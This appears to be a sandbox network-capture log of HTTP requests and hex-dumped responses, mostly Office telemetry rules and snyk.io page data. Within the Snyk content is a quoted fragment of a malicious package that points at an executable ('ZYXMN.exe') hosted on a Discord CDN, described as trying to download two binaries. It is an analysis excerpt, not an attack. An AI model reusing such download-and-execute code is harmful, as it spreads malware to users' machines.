                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              83192.168.2.54984213.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:10 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 632
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: d2ec1471-a01e-0032-1827-261949000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194910Z-r197bdfb6b466qclztvgs64z1000000000vg00000000y7a9
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              84192.168.2.54984523.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC667OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/security-intelligence.json?slug=platform&slug=security-intelligence HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC644INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"vop2dsvz2x4by7"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/security-intelligence.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::kmr4t-1729799350584-93f2aa5dc447
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:10 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799350.1f61080
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC15740INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 34 4a 67 69 65 41 70 54 34 46 78 56 68 42 6a 56 65 4c 6f 7a 67 75 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 39 54 31 39 3a 34 33 3a 30 33 2e 32 30 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 33 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4JgieApT4FxVhBjVeLozgu","type":"Entry","createdAt":"2022-11-09T19:43:03.207Z","updatedAt":"2023-09-23T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC15951INData Raw: 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 32 2d 31 35 54 30 30 3a 31 35 3a 33 36 2e 33 34 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 30 37 54 31 37 3a 30 34 3a 34 39 2e 32 32 38 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 36 2c 22 72 65 76 69 73 69 6f 6e 22 3a 34 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: "createdAt":"2023-02-15T00:15:36.346Z","updatedAt":"2023-06-07T17:04:49.228Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":6,"revision":4,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 53 6e 79 6b e2 80 99 73 20 56 75 6c 6e 65 72 61 62 69 6c 69 74 79 20 44 61 74 61 62 61 73 65 20 63 6f 76 65 72 73 c2 a0 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 62 6f 6c 64 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 33 78 20 6d 6f 72 65 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 69 65 73 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 c2 a0 74 68 61 6e 20 74 68 65 20 6e 65 78 74 20
                                                                                                                                                                                                                                                                                                              Data Ascii: t":[{"data":{},"content":[{"data":{},"marks":[],"value":"Snyks Vulnerability Database covers","nodeType":"text"},{"data":{},"marks":[{"type":"bold"}],"value":"3x more vulnerabilities","nodeType":"text"},{"data":{},"marks":[],"value":"than the next
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC1089INData Raw: 64 20 70 61 79 6d 65 6e 74 20 69 6e 66 6f 5c 22 20 2d 20 43 6f 64 65 20 62 6c 6f 63 6b 20 31 22 2c 22 68 69 64 65 4c 69 6e 65 4e 75 6d 62 65 72 73 22 3a 66 61 6c 73 65 2c 22 73 74 61 72 74 69 6e 67 4c 69 6e 65 4e 75 6d 62 65 72 22 3a 31 2c 22 73 6e 69 70 70 65 74 22 3a 22 75 72 6c 20 3d 20 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 30 30 33 33 36 38 34 37 39 34 34 32 38 37 34 35 31 38 2f 31 30 30 33 33 36 38 37 37 34 33 33 35 39 39 31 38 39 38 2f 5a 59 58 4d 4e 2e 65 78 65 27 5c 6e 75 72 6c 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 30 30 33 33 36 38 34 37 39 34 34 32 38 37 34 35 31 38
                                                                                                                                                                                                                                                                                                              Data Ascii: d payment info\" - Code block 1","hideLineNumbers":false,"startingLineNumber":1,"snippet":"url = 'https://cdn.discordapp.com/attachments/1003368479442874518/1003368774335991898/ZYXMN.exe'\nurl2 = 'https://cdn.discordapp.com/attachments/1003368479442874518
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 62 6f 6c 64 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 74 72 69 65 73 20 74 6f 20 64 6f 77 6e 6c 6f 61 64 20 74 77 6f 20 62 69 6e 61 72 69 65 73 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 2c 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 63 6f 64 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 5a 59 58 4d 4e 2e 65 78 65 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000","nodeType":"text"},{"data":{},"marks":[{"type":"bold"}],"value":"tries to download two binaries","nodeType":"text"},{"data":{},"marks":[],"value":", ","nodeType":"text"},{"data":{},"marks":[{"type":"code"}],"value":"ZYXMN.exe","nodeType":"text
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC12INData Raw: 70 65 22 3a 22 74 61 62 6c 65 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: pe":"table
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 2d 63 65 6c 6c 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 61 62 6c 65 2d 72 6f 77 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 68 61 63 6b 65 72 66 69 6c 65 6c 6f 6c 6c 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 61 62 6c 65 2d 63 65 6c 6c 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000-cell"}],"nodeType":"table-row"},{"data":{},"content":[{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"hackerfileloll","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"table-cell"},{"data":{},"content":[{"data"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC12INData Raw: 22 3a 5b 5d 2c 22 63 6f 6e 63 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: ":[],"conc
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 30 30 30 31 38 30 30 30 0d 0a 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 70 46 6f 34 6a 44 53 42 30 44 6d 53 6c 56 72 79 6f 35 36 36 51 4c 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 30 39 2d 32 30 54 32 33 3a 32 31 3a 30 39 2e 31 38 39 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 37 2d 31 33 54 31 34 3a 33 39 3a 31 33 2e 30 33 30 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72
                                                                                                                                                                                                                                                                                                              Data Ascii: 00018000epts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"pFo4jDSB0DmSlVryo566QL","type":"Entry","createdAt":"2022-09-20T23:21:09.189Z","updatedAt":"2023-07-13T14:39:13.030Z","environment":{"sys":{"id":"master
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC16384INData Raw: 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 63 6f 64 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 6e 6f 47 48 54 61 67 4c 61 73 74 56 65 72 73 69 6f 6e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 20 e2 80 93 20 4e 65 77 20 76 65 72 73 69 6f 6e 20 6f 66 20 61 20 70 61 63 6b 61 67 65 20 68 61 73 20 6e 6f 20 74 61 67 20 69 6e 20 61 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 47 69 74 48 75 62 20 72 65 70 6f 73 69 74 6f 72 79 20 28 61 6c 74 68 6f 75 67 68 2c 20 70 72 65 76 69 6f 75 73 20 76 65 72 73
                                                                                                                                                                                                                                                                                                              Data Ascii: :{},"content":[{"data":{},"content":[{"data":{},"marks":[{"type":"code"}],"value":"noGHTagLastVersion","nodeType":"text"},{"data":{},"marks":[],"value":" New version of a package has no tag in a corresponding GitHub repository (although, previous vers


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              85192.168.2.54984623.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC447OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-apprisk.json?slug=product&slug=snyk-apprisk HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC632INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"ktudzthjl41hf3"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-apprisk.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::x72cm-1729799350606-99f6e2056b78
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:10 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799350.1094d4f
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC15752INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 4d 4f 78 4d 34 74 50 72 4d 65 75 61 68 62 63 43 6e 49 55 67 73 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 32 2d 31 32 54 31 32 3a 34 33 3a 34 37 2e 33 37 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 35 2d 32 31 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3MOxM4tPrMeuahbcCnIUgs","type":"Entry","createdAt":"2023-12-12T12:43:47.376Z","updatedAt":"2024-05-21T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC8836INData Raw: 30 31 54 31 31 3a 34 35 3a 30 37 2e 33 30 31 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 38 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6d 6f 6c 65 63 75 6c 65 4c 6f 67 6f 50 61 72 61 64 65 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61
                                                                                                                                                                                                                                                                                                              Data Ascii: 01T11:45:07.301Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":18,"revision":1,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"moleculeLogoParade"}},"locale":"en-US"},"fields":{"interna
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 65 73 22 3a 36 32 37 32 2c 22 77 69 64 74 68 22 3a 33 33 35 2c 22 66 6f 72 6d 61 74 22 3a 22 73 76 67 22 2c 22 68 65 69 67 68 74 22 3a 37 35 2c 22 76 65 72 73 69 6f 6e 22 3a 31 36 36 33 32 35 38 30 37 31 2c 22 64 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 78 74 22 3a 7b 22 63 75 73 74 6f 6d 22 3a 7b 22 63 61 70 74 69 6f 6e 22 3a 22 6c 6f 67 6f 2d 6e 69 67 68 74 66 61 6c 6c 22 2c 22 63 6c 64 5f 77 70 5f 70 6c 75 67 69 6e 22 3a 22 31 22 2c 22 67 75 69 64 22 3a 22 30 64 61 35 33 62 39 31 64 38 35 63 33 36 64 33 36 64 37 30 34 39 34 38 36 66 65 35 36 33 33 36 22 7d 7d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 77 6f 72 64 70 72 65 73 73 2d 73 79 6e 63 2f 6c 6f 67 6f 2d 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000es":6272,"width":335,"format":"svg","height":75,"version":1663258071,"duration":null,"metadata":{},"context":{"custom":{"caption":"logo-nightfall","cld_wp_plugin":"1","guid":"0da53b91d85c36d36d7049486fe56336"}},"public_id":"wordpress-sync/logo-n
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC8204INData Raw: 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 74 65 78 74 22 3a 22 54 72 61 63 6b 2c 20 6d 65 61 73 75 72 65 20 61 6e 64 20 72 65 70 6f 72 74 20 75 70 6f 6e 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 72 69 73 6b 20 77 69 74 68 20 61 64 76 61 6e 63 65 64 20 61 6e 61 6c 79 74 69 63 73 22 7d 7d 5d 2c 22 61 63 74 69 6f 6e 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 6f 43 39 79 51 46 57 68 51 6e 32 79 6e 30 74
                                                                                                                                                                                                                                                                                                              Data Ascii: e":"en-US"},"fields":{"text":"Track, measure and report upon application risk with advanced analytics"}}],"actions":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3oC9yQFWhQn2yn0t
